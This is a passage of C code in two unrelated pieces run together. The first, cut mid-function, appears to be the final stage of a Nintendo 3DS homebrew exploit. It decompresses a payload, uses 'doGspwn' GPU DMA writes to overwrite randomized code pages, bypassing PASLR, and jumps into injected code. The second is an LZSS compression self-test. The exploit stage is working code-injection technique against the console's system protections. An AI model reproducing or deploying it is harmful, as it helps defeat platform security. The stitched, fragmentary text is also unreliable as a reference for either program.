lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize)); } #else memcpy((u8*)0x14100000, (u8*)0x14300000, secondaryPayloadSize); #endif ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000); // doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000); // in order to bypass paslr we have to search for individual pages to overwrite... int i, j; int k = 0; for(i = 0; i < CN_CODEBIN_SIZE && k < 0xC; i += 0x1000) { for(j = 0; j < 0x0000C000; j += 0x1000) { if(!memcmp((void*)(CN_RANDCODEBIN_COPY_BASE + i), (void*)(CN_3DSX_LOADADR + j), 0x20)) { doGspwn((u32*)(0x14100000 + j), (u32*)(CN_RANDCODEBIN_BASE + i), 0x00001000); svc_sleepThread(10 * 1000 * 1000); k++; break; } } } svc_sleepThread(0x3B9ACA00); void (*reset)(int size)=(void*)CN_3DSX_LOADADR; reset(0); while(1); return 0; }
int lzss_test(char* filename, unsigned int* psize, unsigned int* pcompsize) { int ret; unsigned char* in = NULL; unsigned int insize; unsigned char* out = NULL; unsigned int outsize, outmaxsize; unsigned int crc0, crc1; print("File: %s\n", filename); if(!file_get(filename, &in, &insize)) goto error; *psize = insize; crc32_init(); crc0 = crc32_buffer(in, insize); print("crc: %08X\n", crc0); print("uncompressed size: %d bytes\n", insize); outmaxsize = 2 * insize; out = memory_alloc(outmaxsize); outsize = lzss_compress(in, insize, out, outmaxsize); if(outsize == -1) { print("Compression error\n"); goto error; } *pcompsize = outsize; print("compressed size: %d bytes\n", outsize); print("ratio: %d%%\n", (outsize * 100) / insize); memory_set(in, insize, 0); outsize = lzss_decompress(out, outsize, in, insize); crc1 = crc32_buffer(in, insize); if(crc0 != crc1) { print("CRCs do not match!\n"); goto error; } //if(!file_put("out", in, outsize)) // goto error; print("Success.\n\n"); ret = 1; done: if(in) memory_free(in); if(out) memory_free(out); return ret; error: ret = 0; goto done; }